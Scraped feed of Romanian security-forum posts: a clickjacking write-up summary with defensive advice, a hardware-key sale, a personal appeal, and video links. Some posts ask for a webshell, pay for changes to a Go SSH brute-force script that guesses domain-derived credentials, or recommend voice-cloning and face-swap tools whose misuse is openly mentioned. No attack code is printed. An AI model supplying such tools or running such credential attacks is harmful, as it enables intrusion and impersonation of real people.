Mon, 02 Feb 2026 08:53:19 +0000

Salut, Am nevoie de un webshell mai recent, are careva? Vreau sa rulez niste teste la un EDR. Mersi

1000 lei

Tue, 13 Jan 2026 20:25:24 +0000

Va salut! Dupa cum zice si titlul, caut un mod de a reusi sa fac suma aceasta in 2 zile. Din cauza unor probleme personale ( un deces, schimbat job plus chirie ) am ajuns in punctul in care sa raman efectiv pe zero cu finantele, plus imprumuturi pana reusesc sa iau primul salariu aici. Dar vorba aia, chiria trebuie platita, iar proprietarul de aici m a pasuit deja luna trecuta cand am avut acel eveniment tragic in familie. Sunt unul dintre userii vechi pe aici, de cand matza moarta neagra se injura cu kw3, pax ne dadea xssuri sa furam prajituri la yahoo, ahead isi pierdea masina si virusica era pe garena, ca sa mai depanam amintri, dar nu postez de pe contul meu, cred ca de rusine. Nu am aparut aici ca sa cer ceva gratis, dar as avea rugamintea daca aveti nevoie de cineva care sa va ajute cu diferite taskuri contracost ce implica un calculator, sa ma contactati, si daca o pot face va ajut cu drag. Va multumesc, cu respect.

SVG Filters Clickjacking 2.0: What to Watch for and How to Defend Your Site

Thu, 08 Jan 2026 09:37:39 +0000

RST just shared an interesting write-up on “SVG Filters – Clickjacking 2.0,” posted in the Exploituri section (Dec 7, 2025). RST Forums The big idea is simple: attackers keep finding new ways to hide or reshape what users “think” they are clicking, so the user ends up approving the wrong action. This matters most for high-risk flows like payment approval, account recovery, password changes, crypto transfers, admin panels, and OAuth consent screens. Game Hub Emulator If you run a site or app, the best defense is layered: block framing where possible (CSP frame-ancestors is the modern choice, with X-Frame-Options as legacy backup), require re-auth or step-up checks for sensitive actions, add clear confirmation screens that show the exact action and target, and review any SVG rendering or filter usage in UI layers that sit near “confirm” buttons. Also test your key pages in a “hostile embed” scenario during security review, because clickjacking is often a UX trap more than a pure code bug. The forum post links the full external article for anyone who wants the deep dive.

[Vand] YubiKey Yubico 5C USB-C Securitate hardware completa, dispozitiv criptografic - SIGILAT, nou si IEFTIN

Fri, 12 Dec 2025 11:28:16 +0000

Salutare. Vand acest produs sigilat, nou. Am cumparat 2 dispozitive la timpul respectiv si in prezent folosesc doar unul dintre ele si al doilea a ramas sigilat, nefolosit. -> Descriere produs: YubiKey YuBico 5C USB-C nouă. Dispozitiv cu securitate avansată pentru autentificare. Protejează datele și accesul la conturi online. Conexiune rapidă prin USB-C. Yubikey 5C este o soluție de autentificare ce oferă protecție superioară împotriva phishing-ului, elimină preluările de cont și îndeplinește cerințe de conformitate pentru o autentificare puternică. YubiKey 5C este cheia de securitate USB-C de top din seria YubiKey 5, dezvoltată de Yubico, lider mondial în soluții de autentificare fără parolă. Este un dispozitiv de autentificare hardware multifactor (MFA), care oferă protecție avansată împotriva atacurilor cibernetice, printr-un set complet de protocoale moderne de securitate, inclusiv FIDO2, U2F, Smart Card (PIV), OTP, OpenPGP și altele. Cu o singură cheie compactă, compatibilă cu toate dispozitivele cu port USB-C, îți protejezi accesul la conturi și aplicații critice, fie că lucrezi de la birou, de acasă sau în deplasare. Ce este YubiKey 5C? YubiKey 5C este o cheie fizică de securitate care se conectează prin USB-C și oferă o autentificare extrem de sigură, fără a mai fi nevoie de parole tradiționale sau coduri temporare prin SMS sau aplicații. Este destinată: Autentificării passwordless (fără parolă) Autentificării în doi pași (2FA) Autentificării multifactor (MFA) Utilizatorilor care au nevoie de Smart Card / PIV, OTP, sau semnături digitale criptate Cui i se adresează YubiKey 5C? Utilizatorilor profesioniști care accesează conturi sensibile (e-mail, VPN, platforme cloud) Companiilor care doresc să îmbunătățească securitatea angajaților cu autentificare FIDO2 hardware Administratorilor IT care doresc integrarea rapidă în Active Directory, Azure AD, Okta, etc. Oricărui utilizator care folosește dispozitive moderne cu port USB-C (MacBook, laptopuri Dell, HP, Lenovo etc.) Beneficii și caracteristici cheie 🔒 Multi-protocol, pentru orice nevoie de securitate YubiKey 5C suportă cele mai importante protocoale: FIDO2 / WebAuthn – pentru autentificare fără parolă U2F – pentru compatibilitate cu servicii populare (Google, Microsoft) Smart Card (PIV) – pentru acces securizat în rețele enterprise OpenPGP – pentru criptare și semnături digitale OTP (One-Time Passwords) – pentru compatibilitate cu sisteme clasice 🔌 USB-C – compatibilitate maximă cu dispozitive moderne Se conectează nativ la laptopuri, tablete și telefoane cu USB-C, fără adaptoare. ⚙️ Nu necesită software, drivere sau baterii Se folosește imediat după conectare – plug & play. Nu are componente mobile, nu necesită încărcare sau rețea. 🌐 Compatibilitate largă cu servicii și aplicații Google Workspace, Microsoft 365, Azure, GitHub, Dropbox Manageri de parole: Bitwarden, 1Password, LastPass Sisteme IAM: Okta, Ping Identity, Duo Security Browsere: Chrome, Edge, Firefox, Safari Sisteme de operare: Windows, macOS, Linux, Android 🛡️ Siguranță la nivel enterprise Nu transmite date prin rețea Secretul criptografic este stocat pe un cip securizat, izolat de internet Reduce drastic riscul de phishing și compromitere conturi 📈 Scalabilitate și eficiență în costuri Poate fi implementată rapid în organizații de orice dimensiune Reduce costurile IT prin eliminarea resetărilor de parolă Poate stoca până la 100 de credențiale FIDO2 și 64 de parole OTP pe aplicație Cum funcționează YubiKey 5C? Conectezi cheia la portul USB-C al dispozitivului Activezi autentificarea pe contul dorit (Google, Microsoft etc.) Te autentifici prin simpla atingere a cheii În cazul autentificării multifactor, cheia poate fi folosită împreună cu un PIN sau alt factor suplimentar. De ce să alegi YubiKey 5C? ✔️ Securitate hardware impenetrabilă, fără rețea, fără cloud ✔️ Versatilitate absolută, datorită suportului multi-protocol ✔️ Compatibilitate extinsă cu aplicații și infrastructuri IT ✔️ USB-C nativ – fără adaptoare, fără compromisuri ✔️ Ideală pentru companii și profesioniști, dar și pentru utilizatori individuali ✔️ Gata de utilizare imediată, fără software sau instalare Întrebări frecvente (FAQ) Funcționează YubiKey 5C pe MacBook? Da, este 100% compatibilă cu macOS și porturile USB-C native. Pot folosi aceeași cheie pentru mai multe conturi? Absolut. Poți stoca până la 100 de conturi cu autentificare FIDO2. Este nevoie de aplicație pentru a o folosi? Nu. Cheia funcționează fără software suplimentar – plug & play.

salutare, cineva care se descurca cu go?

Mon, 08 Dec 2025 20:28:03 +0000

Am un script în Go pentru brute-force SSH care funcționează bine – detectează honeypot-uri, conturi nologin și servere reale. Aș dori să modific scriptul astfel încât să funcționeze pe domenii: username-ul să nu mai fie prestabilit, ci să fie format din primele 7 caractere ale numelui domeniului, iar parola să fie numele domeniului fără extensia (.net, .com etc.). Sunt dispus să plătesc între 50 și 150 lei pentru această modificare.

Open Source & Open Weights Ai Tools: Audio / Photo / Video (working on RTX 5090 and lower series)

Sun, 07 Dec 2025 21:04:08 +0000

RVC / Applio - voice cloner / stem extractor / speech to speech (Applio is compatible with RTX 50** series) RVC si Applio sunt unelte foarte utile pentru cei care vor sa cloneze vocea cuiva si sa o foloseasca in conversatii online, sau pentru a modifica o alta voce inregistrata anterior. Spre deosebire de clasicele modele TTS (text-to-speech), cu ajutorul acestor modele puteti vorbi LIVE la telefon sau pe platformele online. Puteti schimba in doar cateva secunde vocea originala de pe o melodie cu vocea voastra. Puteti folosi cu succes atat vocile de femei cat si de barbati pe care le-ati clonat. Rezultatele pot iesi IMPECABIL. RVC este modelul original, insa nu ruleaza corespunzator pe noile placi grafice. Applio functioneaza fara probleme. Recomand sa testati direct Applio. Tutorialul video pentru RVC se aplica in mare parte si pentru Applio si poate fi gasit aici: https://www.youtube.com/watch?v=PYQnzIwa4mA Wan2GP - photo / video / lip sync models for GPU Poor (ruleaza si pe placile video nVidia de 6GB). Wan2GP are integrate mai multe modele ce pot fi folosite cu succes pentru a genera imagini de calitate, sau clipuri la o rezolutie mai mult decat decenta. Printre modelele "vedeta" se numara: Wan 2.1 (necenzurat), Wan 2.2 (necenzurat), Hunyuan 1.5 (necenzurat), Flux 1 (cenzurat), Flux 2 (cenzurat), Qwen Image (necenzurat), si noul model Z-Image (necenzurat), care genereaza poze extrem de credibile in doar cateva secunde. Majoritatea acestor modele de baza vin la pachet cu alte modele care permit crearea si editarea clipurilor si pozelor in toate felurile posibile. Pentru lip sync se pot folosi modelele Wan 2.1>Infinitetalk 14B sau Wan 2.1>Multitalk 14B. Infinitetalk are un lip sync bun, insa are o problema cu degetele (in cazul in care Multe dintre modelele gasite in Wan2GP permit sa clonati infatisarea altor persoane. Stiu sa pastreze caracteristicile fizice (chip, tatuaje, cercei), dar si hainele din imaginile pe care le folositi in generarea clipurilor. Cred ca stiti cine le abuzeaza foarte mult in ultimii ani. Tot in pachetul Wan2GP gasiti modele care va permit sa schimbati cu totul infatisarea unor personaje din clipuri video deja existente. Mai exact, puteti lua un clip cu Ion Iliescu in timp ce face anumite actiuni, sa il bagati intr-un model de pe Wan2GP si sa il inlocuiti cu Nicolae Ceausescu facand aceleasi miscari, in acelasi mediu. Nu necesita prea multa munca, doar sa lasati calculatorul sa proceseze pana isi termina taskul. Tot ce am postat mai mult foloseste interfata Gradio care este mult mai intuitiva decat flowurile din ComfyUI. Aveti nevoie de o placa video capabila "sa duca" aceste modele, de la producatorul nVidia. Dupa cum spuneam, Wan2GP functioneaza si pe placi video cu 6 Gb vram. Cu cat aveti mai mult vram cu atat isi termina mai repede joburile. O placa video cu doar 6 Gb vram poate sa proceseze cateva ore un video, pe cand o placa video cu 32 Gb vram termina acelasi job in cateva minute. Cu cat mai multa memorie RAM cu atat mai bine. Toate modelele de mai sus au nevoie de RAM. Wan2GP are profile diferite care va permit sa il folositi si cu mult mai putin de 128 Gb RAM (viteza de procesare va fi afectata). Am postat la pachet RVC / Applio si Wan2GP pentru ca puteti sa combinati vocile clonate cu Applio cu videourile generate de modelele din Wan2GP. Sunt foarte utile in scopuri "bune" si devastatoare cand sunt folosite in scopuri "malefice". Pentru a instala cat mai usor modelele (poate fi o uriasa bataie de cap sa le instalati), recomand sa folositi Applio (parte a aplicatiei Dione), iar in cazul Wan2GP sa folositi One-click installation - Redtash1 sau Pinokio Computer sau chiar Dione. In cazul in care intampinati probleme atunci cand doriti sa folositi unul dintre aceste modele puteti lasa un mesaj in comentarii si va ajut daca stiu rezolvarea.

SVG Filters - Clickjacking 2.0

Sun, 07 Dec 2025 20:08:17 +0000

O metoda noua si interesanta de clickjacking. Nu voi da copy/paste la articol pentru ca e muncit si e pacat sa ii fac duplicate content. Il gasiti in forma integrala aici https://lyra.horse/blog/2025/12/svg-clickjacking/ Alte articole de pe blogul ei: https://lyra.horse/blog/

[VIDEO] Hacking '😂' to Track ANY WhatsApp or Signal User

Fri, 05 Dec 2025 10:11:05 +0000

De vizionat la plictiseala

Tue, 02 Dec 2025 22:15:11 +0000

Uite asa cum stateam cu berea in brate am dat din intamplare peste ceva frumos de vizionat daca cineva se plictiseste. (24) The Man Who Made Everything on the Internet Free - YouTube The Man Who Tried to Unmask Anonymous ps: nu e al meu canalul, nu am nici o afiliere, nu reclama, pur si simplu beer 🍺, alune si amintiri 🤙 Daca mai stiti ceva interesant de vizionat lasa-ti un reply... hastag 2026 sa-mi bag pl, parca alaltaieri era vara lu '09 cand @Nytro imi dadea warn ca scriam dea-n pulea 😂

ajutor in modificarea unui script bruteforce ssh in goland

Tue, 02 Dec 2025 18:59:53 +0000

Salutare tuturor!